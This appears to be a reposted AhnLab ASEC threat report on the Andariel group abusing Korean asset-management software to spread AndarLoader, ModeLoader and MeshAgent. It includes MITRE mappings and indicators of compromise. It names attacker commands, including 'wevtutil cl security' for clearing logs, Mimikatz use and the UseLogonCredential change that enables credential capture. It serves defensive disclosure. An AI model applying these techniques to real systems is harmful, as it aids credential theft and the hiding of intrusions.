Threat Research

Andariel Group Exploiting Korean Asset Management Solutions (MeshAgent) – ASEC BLOG

Ahnlab

AhnLab ASEC observed the Andariel group exploiting Korean asset-management solutions to distribute loaders and remote-access tools—notably AndarLoader, ModeLoader, and MeshAgent—to perform lateral movement, in-memory execution, and remote control. These intrusions used Mshta-based JavaScript loading, in-memory .NET execution, credential theft with Mimikatz, event log clearing, and remote-control tools such as MeshAgent and RDP. #AndarLoader #MeshAgent

Keypoints

  • Andariel abused Korean asset management solutions to execute payloads during lateral movement and deploy loaders and remote-control tools.
  • AndarLoader acts as a downloader that pulls .NET assemblies and executes them in memory; it supports commands to run assemblies/methods, terminate, and self-delete.
  • AndarLoader samples in this campaign were obfuscated with KoiVM and use the “sslClient” string when communicating with C2 over HTTPS.
  • ModeLoader is a JavaScript loader delivered and executed via Mshta; it polls modeRead.php for Base64 commands and posts results to modeWrite.php.
  • MeshAgent (downloaded in one case as “fav.ico”) was used to provide remote desktop/control capabilities; an active MeshAgent C2 (84.38.129[.]21) was observed.
  • Post-compromise activity included installing Mimikatz for credential dumping (with UseLogonCredential registry modification), clearing security logs using wevtutil, and deploying a keylogger that stores data in C:UsersPublicgame.db.

MITRE Techniques

  • [T1218.005] Mshta – Used to download and execute ModeLoader via a remote Mshta invocation (‘downloaded externally via Mshta and executed’).
  • [T1105] Ingress Tool Transfer – Loaders download external executables and scripts (AndarLoader and ModeLoader) onto targets (‘downloads executable data such as .NET assembly and runs it in the memory’).
  • [T1620] Reflective Code Loading – AndarLoader runs downloaded .NET assemblies directly in memory rather than writing them to disk (‘downloads .NET assembly and runs it in the memory’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Attackers executed commands via cmd.exe for discovery and execution (‘cmd.exe /c tasklist’ and ‘cmd.exe /c c:windowssystem32SVPN*’).
  • [T1027] Obfuscated Files or Information – AndarLoader samples were obfuscated using KoiVM to hide strings and behavior (‘obfuscated using KoiVM’).
  • [T1003] Credential Dumping – Threat actors installed and used Mimikatz to harvest credentials and manipulated UseLogonCredential to enable WDigest capture (‘installed Mimikatz and attempted to steal the credentials’ and ‘sets the UseLogonCredential registry key’).
  • [T1070.001] Clear Windows Event Logs – Attackers removed evidence by clearing the security event log with wevtutil (‘wevtutil cl security’).
  • [T1219] Remote Access Software – MeshAgent was deployed to provide remote desktop and management functionality abused by the attackers (‘MeshAgent…provides web-based remote desktop features such as RDP and VNC’).
  • [T1021.001] Remote Services: RDP – In some cases the actors enabled and used RDP to access infected hosts (‘they also used RDP … the command to activate the RDP service was also found’).
  • [T1056.001] Input Capture: Keylogging – A keylogger was present that captured keystrokes and clipboard data, storing entries in a local database (‘records the keylogged data and data copied to the clipboard in “C:UsersPublicgame.db.”’).
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communication was observed over HTTPS and HTTP endpoints for AndarLoader and ModeLoader (‘privacy.hopto[.]org:443’ and ‘modeRead.php / modeWrite.php endpoints’).

Indicators of Compromise

  • [MD5] Malware file hashes – a714b928bbc7cd480fed85e379966f95 (AndarLoader SVPNClientW.exe), 4f1b1124e34894398aa423200a8ab894 (KeyLogger samples), and 2 more hashes.
  • [C2 Domains/URLs] Command-and-control endpoints – privacy.hopto[.]org:443 (AndarLoader), hxxp://www.ipservice.kro[.]kr/modeRead.php (ModeLoader), and several additional ModeLoader endpoints / view.php / modeWrite.php.
  • [IP Address] Remote management server – 84.38.129[.]21 observed as an active MeshAgent server.

    • <li/[File names] Deployed filenames and paths – %SystemDirectory%SVPNClientW.exe (AndarLoader install location), C:UsersPublicgame.db (keylogger storage), %USERPROFILE%mimi.exe (Mimikatz), and other dropper names.

Attackers exploited legitimate Korean asset-management solutions to run scripted payloads and downloaders during lateral movement. They used Mshta to fetch and execute ModeLoader JavaScript, which routinely polls modeRead.php for Base64-encoded commands and posts results to modeWrite.php; ModeLoader was then used to fetch additional payloads, for example dropping AndarLoader as %SystemDirectory%SVPNClientW.exe and executing it.

AndarLoader operates as an in-memory downloader: it retrieves .NET assemblies, decrypts strings at runtime (samples were obfuscated with KoiVM), and executes methods or assemblies directly in memory. Its command set includes running assemblies/methods, terminating, and self-deletion. C2 communications occurred over HTTPS, with identified endpoints for both AndarLoader and ModeLoader activity.

Post-compromise actions included deploying MeshAgent (observed downloaded as “fav.ico”) to enable remote desktop/control, enabling RDP (commands found to activate the service), running Mimikatz for credential dumping (with UseLogonCredential registry modification), clearing security logs via wevtutil cl security, and installing a keylogger that logs keystrokes and clipboard content to C:UsersPublicgame.db. Network/I/O artifacts and file hashes listed above serve as primary IOCs for detection and containment.

Read more: https://asec.ahnlab.com/en/63192/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint